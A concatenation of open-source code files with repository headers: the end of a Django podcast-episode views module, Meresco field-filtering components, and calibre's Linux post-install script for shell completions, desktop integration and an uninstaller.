except Podcast.DoesNotExist:
raise Http404
equery = Episode.objects.filter(
podcast=podcast, slugs__slug=e_slug, slugs__scope=podcast.id.hex
)
try:
episode = equery.prefetch_related("urls", "slugs").get()
# set previously fetched podcast, to avoid additional query
episode.podcast = podcast
except Episode.DoesNotExist:
raise Http404
# redirect when an ID or a merged (non-canonical) slug is used
if episode.slug and episode.slug != e_slug:
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
return f(request, episode, *args, **kwargs)
return _decorator
def id_decorator(f):
@wraps(f)
def _decorator(request, p_id, e_id, *args, **kwargs):
try:
query = Episode.objects.filter(id=e_id, podcast_id=p_id)
episode = query.select_related("podcast").get()
except Episode.DoesNotExist:
raise Http404
# redirect when an ID or a merged (non-canonical) slug is used
if episode.slug and episode.slug != e_id:
podcast = episode.podcast
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
return f(request, episode, *args, **kwargs)
return _decorator
show_slug = slug_decorator(episode)
toggle_favorite_slug = slug_decorator(toggle_favorite)
add_action_slug = slug_decorator(add_action)
episode_history_slug = slug_decorator(history)
show_id = id_decorator(episode)
toggle_favorite_id = id_decorator(toggle_favorite)
add_action_id = id_decorator(add_action)
episode_history_id = id_decorator(history)
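# Illustrative sketch, not part of the original file: the *_slug and *_id
# callables above are what the URLconf would point at, e.g. (pattern
# strings and converters are assumptions):
#   path("podcast/<uuid:p_id>/<uuid:e_id>", show_id),
#   path("podcast/<slug:p_slug>/episode/<slug:e_slug>", show_slug),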
| agpl-3.0 |
seecr/meresco-components | meresco/components/fieldlets.py | 1 | 2437 | ## begin license ##
#
# "Meresco Components" are components to build searchengines, repositories
# and archives, based on "Meresco Core".
#
# Copyright (C) 2007-2009 SURF Foundation. http://www.surf.nl
# Copyright (C) 2007 SURFnet. http://www.surfnet.nl
# Copyright (C) 2007-2010 Seek You Too (CQ2) http://www.cq2.nl
# Copyright (C) 2007-2009 Stichting Kennisnet Ict op school. http://www.kennisnetictopschool.nl
# Copyright (C) 2011-2012 Seecr (Seek You Too B.V.) http://seecr.nl
#
# This file is part of "Meresco Components"
#
# "Meresco Components" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Components" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Components"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from meresco.core import Transparent, Observable
from meresco.core.generatorutils import asyncnoreturnvalue
class _Fieldlet(Transparent):
def __init__(self, method):
Transparent.__init__(self)
self._method = method
class FilterFieldValue(_Fieldlet):
def addField(self, name, value):
if self._method(value):
self.do.addField(name=name, value=value)
class FilterField(_Fieldlet):
def addField(self, name, value):
if self._method(name):
self.do.addField(name=name, value=value)
class RenameField(_Fieldlet):
def addField(self, name, value):
self.do.addField(name=self._method(name), value=value)
class TransformFieldValue(_Fieldlet):
def addField(self, name, value):
newValue = self._method(value)
if newValue is not None:
self.do.addField(name=name, value=newValue)
class AddField(Observable):
def __init__(self, name, value):
Observable.__init__(self)
self._name = name
self._value = value
@asyncnoreturnvalue
def add(self, *args, **kwargs):
self.do.addField(name=self._name, value=self._value)
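# Illustrative sketch, not part of the original file: these fieldlets are
# meant to be chained in a Meresco observer tree so that each addField()
# call is renamed, filtered and transformed on its way down (exact wiring
# depends on the surrounding DSL; the lambdas below are assumptions):
#   RenameField(lambda name: name.lower()),
#   FilterFieldValue(lambda value: value.strip() != ''),
#   TransformFieldValue(lambda value: value.strip()),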
| gpl-2.0 |
ashang/calibre | src/calibre/linux.py | 5 | 45743 | __license__ = 'GPL v3'
__copyright__ = '2008, Kovid Goyal <kovid at kovidgoyal.net>'
''' Post installation script for linux '''
import sys, os, cPickle, textwrap, stat, errno
from subprocess import check_call, check_output
from functools import partial
from calibre import __appname__, prints, guess_type
from calibre.constants import islinux, isbsd
from calibre.customize.ui import all_input_formats
from calibre.ptempfile import TemporaryDirectory
from calibre import CurrentDir
entry_points = {
'console_scripts': [
'ebook-device = calibre.devices.cli:main',
'ebook-meta = calibre.ebooks.metadata.cli:main',
'ebook-convert = calibre.ebooks.conversion.cli:main',
'ebook-polish = calibre.ebooks.oeb.polish.main:main',
'markdown-calibre = calibre.ebooks.markdown.__main__:run',
'web2disk = calibre.web.fetch.simple:main',
'calibre-server = calibre.library.server.main:main',
'lrf2lrs = calibre.ebooks.lrf.lrfparser:main',
'lrs2lrf = calibre.ebooks.lrf.lrs.convert_from:main',
'calibre-debug = calibre.debug:main',
'calibredb = calibre.library.cli:main',
'calibre-parallel = calibre.utils.ipc.worker:main',
'calibre-customize = calibre.customize.ui:main',
'calibre-complete = calibre.utils.complete:main',
'fetch-ebook-metadata = calibre.ebooks.metadata.sources.cli:main',
'calibre-smtp = calibre.utils.smtp:main',
],
'gui_scripts' : [
__appname__+' = calibre.gui_launch:calibre',
'lrfviewer = calibre.gui2.lrf_renderer.main:main',
'ebook-viewer = calibre.gui_launch:ebook_viewer',
'ebook-edit = calibre.gui_launch:ebook_edit',
],
}
class PreserveMIMEDefaults(object):
def __init__(self):
self.initial_values = {}
def __enter__(self):
def_data_dirs = '/usr/local/share:/usr/share'
paths = os.environ.get('XDG_DATA_DIRS', def_data_dirs)
paths = paths.split(':')
paths.append(os.environ.get('XDG_DATA_HOME', os.path.expanduser(
'~/.local/share')))
paths = list(filter(os.path.isdir, paths))
if not paths:
# Env var had garbage in it, ignore it
paths = def_data_dirs.split(':')
paths = list(filter(os.path.isdir, paths))
self.paths = {os.path.join(x, 'applications/defaults.list') for x in
paths}
self.initial_values = {}
for x in self.paths:
try:
with open(x, 'rb') as f:
self.initial_values[x] = f.read()
except:
self.initial_values[x] = None
def __exit__(self, *args):
for path, val in self.initial_values.iteritems():
if val is None:
try:
os.remove(path)
except:
pass
elif os.path.exists(path):
try:
with open(path, 'r+b') as f:
if f.read() != val:
f.seek(0)
f.truncate()
f.write(val)
except EnvironmentError as e:
if e.errno != errno.EACCES:
raise
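# Illustrative sketch, not part of the original file: the class above is a
# context manager that snapshots and restores the defaults.list files, so
# mime registration can be wrapped like this (file name assumed):
#   with PreserveMIMEDefaults():
#       check_call(['xdg-mime', 'install', 'calibre-mimetypes.xml'])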
# Uninstall script {{{
UNINSTALL = '''\
#!{python}
from __future__ import print_function, unicode_literals
euid = {euid}
import os, subprocess, shutil
try:
raw_input
except NameError:
raw_input = input
if os.geteuid() != euid:
print ('The installer was last run as user id:', euid, 'To remove all files you must run the uninstaller as the same user')
if raw_input('Proceed anyway? [y/n]:').lower() != 'y':
raise SystemExit(1)
frozen_path = {frozen_path!r}
if not frozen_path or not os.path.exists(os.path.join(frozen_path, 'resources', 'calibre-mimetypes.xml')):
frozen_path = None
for f in {mime_resources!r}:
cmd = ['xdg-mime', 'uninstall', f]
print ('Removing mime resource:', os.path.basename(f))
ret = subprocess.call(cmd, shell=False)
if ret != 0:
print ('WARNING: Failed to remove mime resource', f)
for x in tuple({manifest!r}) + tuple({appdata_resources!r}) + (os.path.abspath(__file__), __file__, frozen_path):
if not x or not os.path.exists(x):
continue
print ('Removing', x)
try:
if os.path.isdir(x):
shutil.rmtree(x)
else:
os.unlink(x)
except Exception as e:
print ('Failed to delete', x)
print ('\t', e)
icr = {icon_resources!r}
mimetype_icons = []
def remove_icon(context, name, size, update=False):
cmd = ['xdg-icon-resource', 'uninstall', '--context', context, '--size', size, name]
if not update:
cmd.insert(2, '--noupdate')
print ('Removing icon:', name, 'from context:', context, 'at size:', size)
ret = subprocess.call(cmd, shell=False)
if ret != 0:
print ('WARNING: Failed to remove icon', name)
for i, (context, name, size) in enumerate(icr):
if context == 'mimetypes':
mimetype_icons.append((name, size))
continue
remove_icon(context, name, size, update=i == len(icr) - 1)
mr = {menu_resources!r}
for f in mr:
cmd = ['xdg-desktop-menu', 'uninstall', f]
print ('Removing desktop file:', f)
ret = subprocess.call(cmd, shell=False)
if ret != 0:
print ('WARNING: Failed to remove menu item', f)
print ()
if mimetype_icons and raw_input('Remove the ebook format icons? [y/n]:').lower() in ['', 'y']:
for i, (name, size) in enumerate(mimetype_icons):
remove_icon('mimetypes', name, size, update=i == len(mimetype_icons) - 1)
'''
# }}}
# Completion {{{
class ZshCompleter(object): # {{{
def __init__(self, opts):
self.opts = opts
self.dest = None
base = os.path.dirname(self.opts.staging_sharedir)
self.detect_zsh(base)
if not self.dest and base == '/usr/share':
# Ubuntu puts site-functions in /usr/local/share
self.detect_zsh('/usr/local/share')
self.commands = {}
def detect_zsh(self, base):
for x in ('vendor-completions', 'vendor-functions', 'site-functions'):
c = os.path.join(base, 'zsh', x)
if os.path.isdir(c) and os.access(c, os.W_OK):
self.dest = os.path.join(c, '_calibre')
break
def get_options(self, parser, cover_opts=('--cover',), opf_opts=('--opf',),
file_map={}):
if hasattr(parser, 'option_list'):
options = parser.option_list
for group in parser.option_groups:
options += group.option_list
else:
options = parser
for opt in options:
lo, so = opt._long_opts, opt._short_opts
if opt.takes_value():
lo = [x+'=' for x in lo]
so = [x+'+' for x in so]
ostrings = lo + so
ostrings = u'{%s}'%','.join(ostrings) if len(ostrings) > 1 else ostrings[0]
exclude = u''
if opt.dest is None:
exclude = u"'(- *)'"
h = opt.help or ''
h = h.replace('"', "'").replace('[', '(').replace(
']', ')').replace('\n', ' ').replace(':', '\\:').replace('`', "'")
h = h.replace('%default', type(u'')(opt.default))
arg = ''
if opt.takes_value():
arg = ':"%s":'%h
if opt.dest in {'extract_to', 'debug_pipeline', 'to_dir', 'outbox', 'with_library', 'library_path'}:
arg += "'_path_files -/'"
elif opt.choices:
arg += "(%s)"%'|'.join(opt.choices)
elif set(file_map).intersection(set(opt._long_opts)):
k = set(file_map).intersection(set(opt._long_opts))
exts = file_map[tuple(k)[0]]
if exts:
arg += "'_files -g \"%s\"'"%(' '.join('*.%s'%x for x in
tuple(exts) + tuple(x.upper() for x in exts)))
else:
arg += "_files"
elif (opt.dest in {'pidfile', 'attachment'}):
arg += "_files"
elif set(opf_opts).intersection(set(opt._long_opts)):
arg += "'_files -g \"*.opf\"'"
elif set(cover_opts).intersection(set(opt._long_opts)):
arg += "'_files -g \"%s\"'"%(' '.join('*.%s'%x for x in
tuple(pics) + tuple(x.upper() for x in pics)))
help_txt = u'"[%s]"'%h
yield u'%s%s%s%s '%(exclude, ostrings, help_txt, arg)
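    # For example, a value-taking option ('--output', '-o') with help text
    # "Output file" and a file_map entry of ['lrs'] yields roughly this
    # zsh spec (illustrative):
    #     {--output=,-o+}"[Output file]":"Output file":'_files -g "*.lrs *.LRS"'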
def opts_and_exts(self, name, op, exts, cover_opts=('--cover',),
opf_opts=('--opf',), file_map={}):
if not self.dest:
return
exts = sorted({x.lower() for x in exts})
extra = ('''"*:filename:_files -g '(#i)*.(%s)'" ''' % '|'.join(exts),)
opts = '\\\n '.join(tuple(self.get_options(
op(), cover_opts=cover_opts, opf_opts=opf_opts, file_map=file_map)) + extra)
txt = '_arguments -s \\\n ' + opts
self.commands[name] = txt
def opts_and_words(self, name, op, words, takes_files=False):
if not self.dest:
return
extra = ("'*:filename:_files' ",) if takes_files else ()
opts = '\\\n '.join(tuple(self.get_options(op())) + extra)
txt = '_arguments -s \\\n ' + opts
self.commands[name] = txt
def do_ebook_convert(self, f):
from calibre.ebooks.conversion.plumber import supported_input_formats
from calibre.web.feeds.recipes.collection import get_builtin_recipe_titles
from calibre.customize.ui import available_output_formats
from calibre.ebooks.conversion.cli import create_option_parser, group_titles
from calibre.utils.logging import DevNull
input_fmts = set(supported_input_formats())
output_fmts = set(available_output_formats())
iexts = {x.upper() for x in input_fmts}.union(input_fmts)
oexts = {x.upper() for x in output_fmts}.union(output_fmts)
w = lambda x: f.write(x if isinstance(x, bytes) else x.encode('utf-8'))
# Arg 1
w('\n_ebc_input_args() {')
w('\n local extras; extras=(')
w('\n {-h,--help}":Show Help"')
w('\n "--version:Show program version"')
w('\n "--list-recipes:List builtin recipe names"')
for recipe in sorted(set(get_builtin_recipe_titles())):
recipe = recipe.replace(':', '\\:').replace('"', '\\"')
w(u'\n "%s.recipe"'%(recipe))
w('\n ); _describe -t recipes "ebook-convert builtin recipes" extras')
w('\n _files -g "%s"'%' '.join(('*.%s'%x for x in iexts)))
w('\n}\n')
# Arg 2
w('\n_ebc_output_args() {')
w('\n local extras; extras=(')
for x in output_fmts:
w('\n ".{0}:Convert to a .{0} file with the same name as the input file"'.format(x))
w('\n ); _describe -t output "ebook-convert output" extras')
w('\n _files -g "%s"'%' '.join(('*.%s'%x for x in oexts)))
w('\n _path_files -/')
w('\n}\n')
log = DevNull()
def get_parser(input_fmt='epub', output_fmt=None):
of = ('dummy2.'+output_fmt) if output_fmt else 'dummy'
return create_option_parser(('ec', 'dummy1.'+input_fmt, of, '-h'), log)[0]
# Common options
input_group, output_group = group_titles()
p = get_parser()
opts = p.option_list
for group in p.option_groups:
if group.title not in {input_group, output_group}:
opts += group.option_list
opts.append(p.get_option('--pretty-print'))
opts.append(p.get_option('--input-encoding'))
opts = '\\\n '.join(tuple(
self.get_options(opts, file_map={'--search-replace':()})))
w('\n_ebc_common_opts() {')
w('\n _arguments -s \\\n ' + opts)
w('\n}\n')
# Input/Output format options
for fmts, group_title, func in (
(input_fmts, input_group, '_ebc_input_opts_%s'),
(output_fmts, output_group, '_ebc_output_opts_%s'),
):
for fmt in fmts:
is_input = group_title == input_group
if is_input and fmt in {'rar', 'zip', 'oebzip'}:
continue
p = (get_parser(input_fmt=fmt) if is_input
else get_parser(output_fmt=fmt))
opts = None
for group in p.option_groups:
if group.title == group_title:
opts = [o for o in group.option_list if
'--pretty-print' not in o._long_opts and
'--input-encoding' not in o._long_opts]
if not opts:
continue
opts = '\\\n '.join(tuple(self.get_options(opts)))
w('\n%s() {'%(func%fmt))
w('\n _arguments -s \\\n ' + opts)
w('\n}\n')
w('\n_ebook_convert() {')
w('\n local iarg oarg context state_descr state line\n typeset -A opt_args\n local ret=1')
w("\n _arguments '1: :_ebc_input_args' '*::ebook-convert output:->args' && ret=0")
w("\n case $state in \n (args)")
w('\n iarg=${line[1]##*.}; ')
w("\n _arguments '1: :_ebc_output_args' '*::ebook-convert options:->args' && ret=0")
w("\n case $state in \n (args)")
w('\n oarg=${line[1]##*.}')
w('\n iarg="_ebc_input_opts_${(L)iarg}"; oarg="_ebc_output_opts_${(L)oarg}"')
w('\n _call_function - $iarg; _call_function - $oarg; _ebc_common_opts; ret=0')
w('\n ;;\n esac')
w("\n ;;\n esac\n return ret")
w('\n}\n')
def do_ebook_edit(self, f):
from calibre.ebooks.oeb.polish.main import SUPPORTED
from calibre.ebooks.oeb.polish.import_book import IMPORTABLE
from calibre.gui2.tweak_book.main import option_parser
tweakable_fmts = SUPPORTED | IMPORTABLE
parser = option_parser()
opt_lines = []
for opt in parser.option_list:
lo, so = opt._long_opts, opt._short_opts
if opt.takes_value():
lo = [x+'=' for x in lo]
so = [x+'+' for x in so]
ostrings = lo + so
ostrings = u'{%s}'%','.join(ostrings) if len(ostrings) > 1 else '"%s"'%ostrings[0]
h = opt.help or ''
h = h.replace('"', "'").replace('[', '(').replace(
']', ')').replace('\n', ' ').replace(':', '\\:').replace('`', "'")
h = h.replace('%default', type(u'')(opt.default))
help_txt = u'"[%s]"'%h
opt_lines.append(ostrings + help_txt + ' \\')
opt_lines = ('\n' + (' ' * 8)).join(opt_lines)
f.write((ur'''
_ebook_edit() {
local curcontext="$curcontext" state line ebookfile expl
typeset -A opt_args
_arguments -C -s \
%s
"1:ebook file:_files -g '(#i)*.(%s)'" \
'*:file in ebook:->files' && return 0
case $state in
files)
ebookfile=${~${(Q)line[1]}}
if [[ -f "$ebookfile" && "$ebookfile" =~ '\.[eE][pP][uU][bB]$' ]]; then
_zip_cache_name="$ebookfile"
_zip_cache_list=( ${(f)"$(zipinfo -1 $_zip_cache_name 2>/dev/null)"} )
else
return 1
fi
_wanted files expl 'file from ebook' \
_multi_parts / _zip_cache_list && return 0
;;
esac
return 1
}
''' % (opt_lines, '|'.join(tweakable_fmts)) + '\n\n').encode('utf-8'))
def do_calibredb(self, f):
import calibre.library.cli as cli
from calibre.customize.ui import available_catalog_formats
parsers, descs = {}, {}
for command in cli.COMMANDS:
op = getattr(cli, '%s_option_parser'%command)
args = [['t.epub']] if command == 'catalog' else []
p = op(*args)
if isinstance(p, tuple):
p = p[0]
parsers[command] = p
lines = [x.strip().partition('.')[0] for x in p.usage.splitlines() if x.strip() and
not x.strip().startswith('%prog')]
descs[command] = lines[0]
f.write('\n_calibredb_cmds() {\n local commands; commands=(\n')
f.write(' {-h,--help}":Show help"\n')
f.write(' "--version:Show version"\n')
for command, desc in descs.iteritems():
f.write(' "%s:%s"\n'%(
command, desc.replace(':', '\\:').replace('"', '\'')))
f.write(' )\n _describe -t commands "calibredb command" commands \n}\n')
subcommands = []
for command, parser in parsers.iteritems():
exts = []
if command == 'catalog':
exts = [x.lower() for x in available_catalog_formats()]
elif command == 'set_metadata':
exts = ['opf']
exts = set(exts).union(x.upper() for x in exts)
pats = ('*.%s'%x for x in exts)
extra = ("'*:filename:_files -g \"%s\"' "%' '.join(pats),) if exts else ()
if command in {'add', 'add_format'}:
extra = ("'*:filename:_files' ",)
opts = '\\\n '.join(tuple(self.get_options(
parser)) + extra)
txt = ' _arguments -s \\\n ' + opts
subcommands.append('(%s)'%command)
subcommands.append(txt)
subcommands.append(';;')
f.write('\n_calibredb() {')
f.write((
r'''
local state line state_descr context
typeset -A opt_args
local ret=1
_arguments \
'1: :_calibredb_cmds' \
'*::calibredb subcommand options:->args' \
&& ret=0
case $state in
(args)
case $line[1] in
(-h|--help|--version)
_message 'no more arguments' && ret=0
;;
%s
esac
;;
esac
return ret
'''%'\n '.join(subcommands)).encode('utf-8'))
f.write('\n}\n\n')
def write(self):
if self.dest:
for c in ('calibredb', 'ebook-convert', 'ebook-edit'):
self.commands[c] = ' _%s "$@"' % c.replace('-', '_')
with open(self.dest, 'wb') as f:
f.write('#compdef ' + ' '.join(self.commands)+'\n')
self.do_ebook_convert(f)
self.do_calibredb(f)
self.do_ebook_edit(f)
f.write('case $service in\n')
for c, txt in self.commands.iteritems():
if isinstance(txt, type(u'')):
txt = txt.encode('utf-8')
if isinstance(c, type(u'')):
c = c.encode('utf-8')
f.write(b'%s)\n%s\n;;\n'%(c, txt))
f.write('esac\n')
# }}}
def get_bash_completion_path(root, share, info):
if root == '/usr':
# Try to get the system bash completion dir since we are installing to
# /usr
try:
path = check_output('pkg-config --variable=completionsdir bash-completion'.split()).strip().partition(os.pathsep)[0]
except Exception:
info('Failed to find directory to install bash completions, using default.')
path = '/usr/share/bash-completion/completions'
if path and os.path.exists(path) and os.path.isdir(path):
return os.path.join(path, 'calibre')
else:
# Use the default bash-completion dir under staging_share
return os.path.join(share, 'bash-completion', 'completions', 'calibre')
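# Example outcomes (hypothetical paths): with root='/usr' and a working
# pkg-config this typically returns
# '/usr/share/bash-completion/completions/calibre'; otherwise it falls back
# to <share>/bash-completion/completions/calibre.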
def write_completion(bash_comp_dest, zsh):
from calibre.ebooks.metadata.cli import option_parser as metaop, filetypes as meta_filetypes
from calibre.ebooks.lrf.lrfparser import option_parser as lrf2lrsop
from calibre.gui2.lrf_renderer.main import option_parser as lrfviewerop
from calibre.gui2.viewer.main import option_parser as viewer_op
from calibre.gui2.tweak_book.main import option_parser as tweak_op
from calibre.ebooks.metadata.sources.cli import option_parser as fem_op
from calibre.gui2.main import option_parser as guiop
from calibre.utils.smtp import option_parser as smtp_op
from calibre.library.server.main import option_parser as serv_op
from calibre.ebooks.oeb.polish.main import option_parser as polish_op, SUPPORTED
from calibre.ebooks.oeb.polish.import_book import IMPORTABLE
from calibre.debug import option_parser as debug_op
from calibre.ebooks import BOOK_EXTENSIONS
from calibre.customize.ui import available_input_formats
input_formats = sorted(all_input_formats())
tweak_formats = sorted(x.lower() for x in SUPPORTED|IMPORTABLE)
if bash_comp_dest and not os.path.exists(os.path.dirname(bash_comp_dest)):
os.makedirs(os.path.dirname(bash_comp_dest))
complete = 'calibre-complete'
if getattr(sys, 'frozen_path', None):
complete = os.path.join(getattr(sys, 'frozen_path'), complete)
with open(bash_comp_dest or os.devnull, 'wb') as f:
def o_and_e(*args, **kwargs):
f.write(opts_and_exts(*args, **kwargs))
zsh.opts_and_exts(*args, **kwargs)
def o_and_w(*args, **kwargs):
f.write(opts_and_words(*args, **kwargs))
zsh.opts_and_words(*args, **kwargs)
f.write('# calibre Bash Shell Completion\n')
o_and_e('calibre', guiop, BOOK_EXTENSIONS)
o_and_e('lrf2lrs', lrf2lrsop, ['lrf'], file_map={'--output':['lrs']})
o_and_e('ebook-meta', metaop,
list(meta_filetypes()), cover_opts=['--cover', '-c'],
opf_opts=['--to-opf', '--from-opf'])
o_and_e('ebook-polish', polish_op,
[x.lower() for x in SUPPORTED], cover_opts=['--cover', '-c'],
opf_opts=['--opf', '-o'])
o_and_e('lrfviewer', lrfviewerop, ['lrf'])
o_and_e('ebook-viewer', viewer_op, input_formats)
o_and_e('ebook-edit', tweak_op, tweak_formats)
o_and_w('fetch-ebook-metadata', fem_op, [])
o_and_w('calibre-smtp', smtp_op, [])
o_and_w('calibre-server', serv_op, [])
o_and_e('calibre-debug', debug_op, ['py', 'recipe', 'mobi', 'azw', 'azw3', 'docx'], file_map={
'--tweak-book':['epub', 'azw3', 'mobi'],
'--subset-font':['ttf', 'otf'],
'--exec-file':['py', 'recipe'],
'--add-simple-plugin':['py'],
'--inspect-mobi':['mobi', 'azw', 'azw3'],
'--viewer':list(available_input_formats()),
})
f.write(textwrap.dedent('''
_ebook_device_ls()
{
local pattern search listing prefix
pattern="$1"
search="$1"
            if [[ -n "${pattern}" ]]; then
if [[ "${pattern:(-1)}" == "/" ]]; then
pattern=""
else
pattern="$(basename ${pattern} 2> /dev/null)"
search="$(dirname ${search} 2> /dev/null)"
fi
fi
if [[ "x${search}" == "x" || "x${search}" == "x." ]]; then
search="/"
fi
listing="$(ebook-device ls ${search} 2>/dev/null)"
prefix="${search}"
if [[ "x${prefix:(-1)}" != "x/" ]]; then
prefix="${prefix}/"
fi
echo $(compgen -P "${prefix}" -W "${listing}" "${pattern}")
}
_ebook_device()
{
local cur prev
cur="${COMP_WORDS[COMP_CWORD]}"
prev="${COMP_WORDS[COMP_CWORD-1]}"
COMPREPLY=()
case "${prev}" in
ls|rm|mkdir|touch|cat )
COMPREPLY=( $(_ebook_device_ls "${cur}") )
return 0
;;
cp )
if [[ ${cur} == dev:* ]]; then
COMPREPLY=( $(_ebook_device_ls "${cur:7}") )
return 0
else
_filedir
return 0
fi
;;
dev )
COMPREPLY=( $(compgen -W "cp ls rm mkdir touch cat info books df" "${cur}") )
return 0
;;
* )
if [[ ${cur} == dev:* ]]; then
COMPREPLY=( $(_ebook_device_ls "${cur:7}") )
return 0
else
if [[ ${prev} == dev:* ]]; then
_filedir
return 0
else
COMPREPLY=( $(compgen -W "dev:" "${cur}") )
return 0
fi
return 0
fi
;;
esac
}
complete -o nospace -F _ebook_device ebook-device
complete -o nospace -C %s ebook-convert
''')%complete)
zsh.write()
# }}}
class PostInstall:
def task_failed(self, msg):
self.warn(msg, 'with error:')
import traceback
tb = '\n\t'.join(traceback.format_exc().splitlines())
self.info('\t'+tb)
print
def warning(self, *args, **kwargs):
print '\n'+'_'*20, 'WARNING','_'*20
prints(*args, **kwargs)
print '_'*50
print ('\n')
self.warnings.append((args, kwargs))
sys.stdout.flush()
def __init__(self, opts, info=prints, warn=None, manifest=None):
self.opts = opts
self.info = info
self.warn = warn
self.warnings = []
if self.warn is None:
self.warn = self.warning
if not self.opts.staging_bindir:
self.opts.staging_bindir = os.path.join(self.opts.staging_root,
'bin')
if not self.opts.staging_sharedir:
self.opts.staging_sharedir = os.path.join(self.opts.staging_root,
'share', 'calibre')
self.opts.staging_etc = '/etc' if self.opts.staging_root == '/usr' else \
os.path.join(self.opts.staging_root, 'etc')
scripts = cPickle.loads(P('scripts.pickle', data=True))
self.manifest = manifest or []
if getattr(sys, 'frozen_path', False):
if os.access(self.opts.staging_bindir, os.W_OK):
self.info('Creating symlinks...')
for exe in scripts.keys():
dest = os.path.join(self.opts.staging_bindir, exe)
if os.path.lexists(dest):
os.unlink(dest)
tgt = os.path.join(getattr(sys, 'frozen_path'), exe)
self.info('\tSymlinking %s to %s'%(tgt, dest))
os.symlink(tgt, dest)
self.manifest.append(dest)
else:
self.warning(textwrap.fill(
'No permission to write to %s, not creating program launch symlinks,'
' you should ensure that %s is in your PATH or create the symlinks yourself' % (
self.opts.staging_bindir, getattr(sys, 'frozen_path', 'the calibre installation directory'))))
self.icon_resources = []
self.menu_resources = []
self.mime_resources = []
self.appdata_resources = []
if islinux or isbsd:
self.setup_completion()
if islinux or isbsd:
self.setup_desktop_integration()
self.create_uninstaller()
from calibre.utils.config import config_dir
if os.path.exists(config_dir):
os.chdir(config_dir)
if islinux or isbsd:
for f in os.listdir('.'):
if os.stat(f).st_uid == 0:
import shutil
shutil.rmtree(f) if os.path.isdir(f) else os.unlink(f)
if os.stat(config_dir).st_uid == 0:
os.rmdir(config_dir)
if warn is None and self.warnings:
self.info('\n\nThere were %d warnings\n'%len(self.warnings))
for args, kwargs in self.warnings:
self.info('*', *args, **kwargs)
print
def create_uninstaller(self):
base = self.opts.staging_bindir
if not os.access(base, os.W_OK) and getattr(sys, 'frozen_path', False):
base = sys.frozen_path
dest = os.path.join(base, 'calibre-uninstall')
self.info('Creating un-installer:', dest)
raw = UNINSTALL.format(
python='/usr/bin/python', euid=os.geteuid(),
manifest=self.manifest, icon_resources=self.icon_resources,
mime_resources=self.mime_resources, menu_resources=self.menu_resources,
appdata_resources=self.appdata_resources, frozen_path=getattr(sys, 'frozen_path', None))
try:
with open(dest, 'wb') as f:
f.write(raw)
os.chmod(dest, stat.S_IRWXU|stat.S_IRGRP|stat.S_IROTH)
if os.geteuid() == 0:
os.chown(dest, 0, 0)
except:
if self.opts.fatal_errors:
raise
self.task_failed('Creating uninstaller failed')
def setup_completion(self): # {{{
try:
self.info('Setting up command-line completion...')
zsh = ZshCompleter(self.opts)
if zsh.dest:
self.info('Installing zsh completion to:', zsh.dest)
self.manifest.append(zsh.dest)
bash_comp_dest = get_bash_completion_path(self.opts.staging_root, os.path.dirname(self.opts.staging_sharedir), self.info)
if bash_comp_dest is not None:
self.info('Installing bash completion to:', bash_comp_dest)
self.manifest.append(bash_comp_dest)
write_completion(bash_comp_dest, zsh)
except TypeError as err:
if 'resolve_entities' in str(err):
print 'You need python-lxml >= 2.0.5 for calibre'
sys.exit(1)
raise
except EnvironmentError as e:
if e.errno == errno.EACCES:
self.warning('Failed to setup completion, permission denied')
if self.opts.fatal_errors:
raise
self.task_failed('Setting up completion failed')
except:
if self.opts.fatal_errors:
raise
self.task_failed('Setting up completion failed')
# }}}
def setup_desktop_integration(self): # {{{
try:
self.info('Setting up desktop integration...')
env = os.environ.copy()
cc = check_call
if getattr(sys, 'frozen_path', False) and 'LD_LIBRARY_PATH' in env:
paths = env.get('LD_LIBRARY_PATH', '').split(os.pathsep)
paths = [x for x in paths if x]
npaths = [x for x in paths if x != sys.frozen_path+'/lib']
env['LD_LIBRARY_PATH'] = os.pathsep.join(npaths)
cc = partial(check_call, env=env)
with TemporaryDirectory() as tdir, CurrentDir(tdir), \
PreserveMIMEDefaults():
render_img('mimetypes/lrf.png', 'calibre-lrf.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-lrf.png application-lrf', shell=True)
self.icon_resources.append(('mimetypes', 'application-lrf', '128'))
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-lrf.png text-lrs', shell=True)
                self.icon_resources.append(('mimetypes', 'text-lrs', '128'))
render_img('mimetypes/mobi.png', 'calibre-mobi.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-mobi.png application-x-mobipocket-ebook', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-mobipocket-ebook', '128'))
render_img('mimetypes/tpz.png', 'calibre-tpz.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-tpz.png application-x-topaz-ebook', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-topaz-ebook', '128'))
render_img('mimetypes/azw2.png', 'calibre-azw2.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-azw2.png application-x-kindle-application', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-kindle-application', '128'))
render_img('mimetypes/azw3.png', 'calibre-azw3.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-azw3.png application-x-mobi8-ebook', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-mobi8-ebook', '128'))
render_img('lt.png', 'calibre-gui.png', width=256, height=256)
cc('xdg-icon-resource install --noupdate --size 256 calibre-gui.png calibre-gui', shell=True)
self.icon_resources.append(('apps', 'calibre-gui', '256'))
render_img('viewer.png', 'calibre-viewer.png', width=256, height=256)
cc('xdg-icon-resource install --size 256 calibre-viewer.png calibre-viewer', shell=True)
self.icon_resources.append(('apps', 'calibre-viewer', '256'))
render_img('tweak.png', 'calibre-ebook-edit.png', width=256, height=256)
cc('xdg-icon-resource install --size 256 calibre-ebook-edit.png calibre-ebook-edit', shell=True)
self.icon_resources.append(('apps', 'calibre-ebook-edit', '256'))
mimetypes = set()
for x in all_input_formats():
mt = guess_type('dummy.'+x)[0]
if mt and 'chemical' not in mt and 'ctc-posml' not in mt:
mimetypes.add(mt)
